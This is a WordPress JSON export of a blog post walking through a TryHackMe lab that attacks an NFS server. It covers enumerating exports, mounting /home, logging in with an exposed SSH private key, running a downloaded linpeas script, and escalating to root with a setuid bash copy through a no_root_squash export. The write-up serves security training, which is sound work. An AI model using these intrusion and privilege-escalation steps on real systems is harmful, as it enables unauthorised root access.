{"id":131051,"date":"2023-01-07T11:03:32","date_gmt":"2023-01-07T11:03:32","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1041581"},"modified":"2023-01-07T11:03:32","modified_gmt":"2023-01-07T11:03:32","slug":"hacking-network-file-system-nfs-a-tryhackme-walkthrough","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/01\/07\/hacking-network-file-system-nfs-a-tryhackme-walkthrough\/","title":{"rendered":"Hacking Network File System (NFS) \u2013 A TryHackMe Walkthrough"},"content":{"rendered":"\n
\n
\n
\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n<\/p><\/div>\n
\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n
5\/5 – (1 vote) <\/div>\n<\/p><\/div>\n
\"YouTube<\/a>
<\/figcaption><\/figure>\n

OBJECTIVE<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n

NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows\/Linux\/Mac). <\/p>\n

In this practice box<\/a> from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final root.txt<\/code> flag.<\/p>\n

WHAT IS NO-ROOT SQUASH?<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n

No-root Squash<\/strong> is an uncommon configuration (some might say a misconfiguration) on the NFS file system. <\/p>\n

When enabled, it allows remote users to change file permissions on any file and also to add a SETUID<\/code> bit to effectively run programs as the root user. Normally it is disabled to protect against hackers, and all root-created files are assigned to an unprivileged owner named nfsnobody<\/code>.<\/p>\n

\"\ud83d\udc49\" Recommended<\/strong>: If you are interested in learning more technical details about how this works, I\u2019d recommend this article<\/a> on no_root_squash<\/code> and other configuration options when using NFS.<\/p>\n

ENUMERATION<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n

We\u2019ll start with a standard Nmap scan of all ports with the -p-<\/code> flag:<\/p>\n

nmap $targetIP -p-<\/pre>\n
The scan shows an nfs<\/code> service running on port. Let\u2019s find out what directories are mountable with the command:<\/p>\n
showmount -e $targetIP<\/pre>\n
(-e<\/code> for exports)<\/p>\n
\n
\"\"<\/figure>\n<\/div>\n
Let\u2019s go ahead and mount the \/home<\/code> directory to our target machine. I\u2019m using Parrot OS virtual machine with a Mate desktop environment running in Gnome Boxes. We can mount the nfs<\/code> directory directly to our local filesystem with the command:<\/p>\n
mount -t nfs $targetIP:\/home \/mount<\/pre>\n
(-t<\/code> indicates filetype)\u00a0<\/p>\n
And now we can continue further enumeration by poking around the filesystem.<\/p>\n
cd \/mount\nls -la\n<\/pre>\n
We find a user folder in the home directory, cappuccino<\/code> and a hidden directory .ssh<\/code>. Inside the directory there is an id_rsa<\/code> file that holds a private ssh key.<\/p>\n
INITIAL FOOTHOLD – USER CAPPUCCINO\u00a0<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
After copying the id_rsa<\/code> over to our target machine, we can ssh into cappuccino\u2019s account with this command:<\/p>\n
ssh -i id_rsa cappuccino@$targetIP<\/pre>\n
ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
Now that we have our initial foothold, we can grab a copy of the well-known script linpeas.sh<\/code> from the official git repo<\/a> and use it to automate the enumeration of attack vectors for privilege escalation on the target machine. We\u2019ll navigate to the \/mount<\/code> folder and use the command wget<\/code> on our attack machine for this:<\/p>\n
sudo wget https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh\u00a0<\/pre>\n
Before running the sh program from our target machine, we need to add execute permissions to the file from our attack machine. <\/p>\n
The beauty of mounting NFS file systems in Linux is evident here as we can easily add permissions to linpeas.sh<\/code> from our attack machine to set up the program to be executable on the target machine<\/em>.<\/p>\n
chmod +x linpeas.sh<\/pre>\n
Now that linpeas.sh<\/code> is located in the \/home<\/code> folder of the target machine, we can run it to start the automated enumeration:<\/p>\n
.\/linpeas.sh<\/pre>\n
This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text. <\/p>\n
Scrolling through the results, we quickly find the no_root_squash<\/code> listed under NFS. We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.<\/p>\n
\n
\"\"<\/figure>\n<\/div>\n
EXPLOITING NO_ROOT_SQUASH<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
First, let\u2019s grab the bash executable for Ubuntu Server 18.04 from the link<\/a> on TryHackMe.<\/p>\n
Sudo wget https:\/\/github.com\/TheRealPoloMints\/Blog\/blob\/master\/Security%20Challenge%20Walkthroughs\/Networks%202\/bash<\/pre>\n
Now we add the SETUID<\/code> bit to the file bash and make it executable. This is the key to gaining root access with no_root_squash<\/code>.<\/p>\n
sudo chmod +sx bash<\/pre>\n
Running bash now from our target machine doesn\u2019t seem to change us to the root user yet.<\/p>\n
.\/bash<\/pre>\n
\n
\"\"<\/figure>\n<\/div>\n
The final trick we need to use is to enable persistence mode with the flag -p<\/code><\/p>\n
\n
\"\"<\/figure>\n<\/div>\n
If you liked this tutorial, you’d probably love my video walkthrough as well:<\/p>\n
\"\ud83d\udc49\" Recommended Tutorial<\/strong>: Alice in Wonderland — TryHackMe<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
5\/5 – (1 vote) OBJECTIVE NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows\/Linux\/Mac). In this practice box from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final root.txt flag. WHAT IS NO-ROOT SQUASH? […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131051","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131051","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131051"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131051\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131051"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131051"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131051"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}